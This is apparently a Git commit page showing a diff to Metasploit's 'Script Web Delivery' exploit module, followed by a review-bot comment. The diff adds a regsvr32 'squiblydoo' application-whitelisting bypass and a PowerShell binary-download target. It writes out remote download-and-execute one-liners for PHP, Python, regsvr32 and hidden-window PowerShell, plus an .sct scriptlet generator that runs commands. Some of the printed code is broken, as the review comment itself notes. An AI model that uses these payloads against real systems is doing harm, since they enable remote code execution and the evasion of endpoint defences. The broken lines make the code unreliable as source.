Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)

bug/bundler_fix
Jeffrey Martin 2017-10-25 12:44:04 -05:00
commit 4999606b61
3 changed files with 124 additions and 35 deletions


@ -139,7 +139,7 @@ Gem::Specification.new do |spec|
# Library for Generating Randomized strings valid as Identifiers such as variable names
spec.add_runtime_dependency 'rex-random_identifier'
# library for creating Powershell scripts for exploitation purposes
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"]
# Library for processing and creating Zip compatbile archives
spec.add_runtime_dependency 'rex-zip'
# Library for parsing offline Windows Registry files


@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer
@ -16,21 +17,33 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Script Web Delivery',
'Description' => %q(
This module quickly fires up a web server that serves a payload.
The provided command will start the specified scripting language interpreter and then download and execute the
payload. The main purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
write to disk so it is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
x86 payloads on x64 machines.
The provided command which will allow for a payload to download and execute.
It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe
for bypassing application whitelisting. The main purpose of this module is to quickly establish
a session on a target machine when the attacker has to manually type in the command:
e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter.
When using either of the PSH targets, ensure the payload architecture matches the target computer
or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting.
The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
can occur on the same port.
"PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
'Ben Campbell',
'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
'Trenton Ivey', # AppLocker MSF Module (kn0)
'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
],
'DefaultOptions' =>
{
@ -38,10 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote
},
'References' =>
[
['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
],
'Platform' => %w(python php win),
'Targets' =>
@ -57,16 +71,60 @@ class MetasploitModule < Msf::Exploit::Remote
['PSH', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}],
['Regsvr32', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}],
['PSH (Binary)', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 19 2013'
))
register_advanced_options(
[
OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
], self.class
)
end
def primer
php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
print_status("Run the following command on the target machine:")
case target.name
when 'PHP'
print_line("#{php}")
when 'Python'
print_line("#{python}")
when 'PSH'
psh = gen_psh("#{get_uri}", "string")
print_line("#{psh}")
when 'Regsvr32'
print_line("#{regsvr}")
when 'PSH (Binary)'
psh = gen_psh("#{get_uri}", "download")
print_line("#{psh}")
end
end
def on_request_uri(cli, _request)
print_status('Delivering Payload')
if target.name.include? 'PSH'
if _request.raw_uri =~ /\.sct$/
psh = gen_psh("#{get_uri}", "string")
data = gen_sct_file(psh)
elsif target.name.include? 'PSH (Binary)'
data = generate_payload_exe
elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
data = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
@ -75,27 +133,55 @@ class MetasploitModule < Msf::Exploit::Remote
else
data = %Q(#{payload.encoded})
end
if _request.raw_uri =~ /\.sct$/
print_status("Handling .sct Request")
send_response(cli, data, 'Content-Type' => 'text/plain')
else
print_status("Delivering Payload")
send_response(cli, data, 'Content-Type' => 'application/octet-stream')
end
end
def primer
url = get_uri
print_status('Run the following command on the target machine:')
case target.name
when 'PHP'
print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
when 'Python'
print_line('Python:')
print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
when 'PSH'
def gen_psh(url, *method)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
if method.include? 'string'
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
else
# Random filename to use, if there isn't anything set
random = "#{rand_text_alphanumeric 8}.exe"
# Set filename (Use random filename if empty)
filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
# Set path (Use %TEMP% if empty)
path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
# Join Path and Filename
file = %Q(echo (#{path}+'\\#(unknown)'))
# Generate download PowerShell command
download_string = Rex::Powershell::PshMethods.download_run(url, file})
end
download_and_run = "#{ignore_cert}#{download_string}"
print_line generate_psh_command_line(
noprofile: true,
# Generate main PowerShell command
return generate_psh_command_line(noprofile: true,
windowstyle: 'hidden',
command: download_and_run
)
end
def rand_class_id
"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
end
def gen_sct_file(command)
%{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
end
end
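Review bot: gen_psh reads `datastore['BinaryEXE-FILENAME']` and `datastore['BinaryEXE-PATH']`, but the advanced options registered in the earlier hunk are named `PSHBinary-FILENAME` and `PSHBinary-PATH`, so whatever the operator sets is never seen and the PSH (Binary) target always falls back to a random name under `$env:temp`. Reading the registered keys fixes it: `filename = datastore['PSHBinary-FILENAME'].blank? ? random : datastore['PSHBinary-FILENAME']` and `path = datastore['PSHBinary-PATH'].blank? ? "$env:temp" : %Q('#{datastore['PSHBinary-PATH']}')`. The `download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)` assignment directly after `ignore_cert` is overwritten on both branches of the following `if` and can be dropped. The `#(unknown)` inside the `file` string and the stray `}` in the `download_run(url, file})` call look like rendering artifacts of this page rather than source, but are worth confirming against the file since, as printed, neither line would parse.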


@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer
include Msf::Module::Deprecated
deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb')
def initialize(info = {})
super(update_info(info,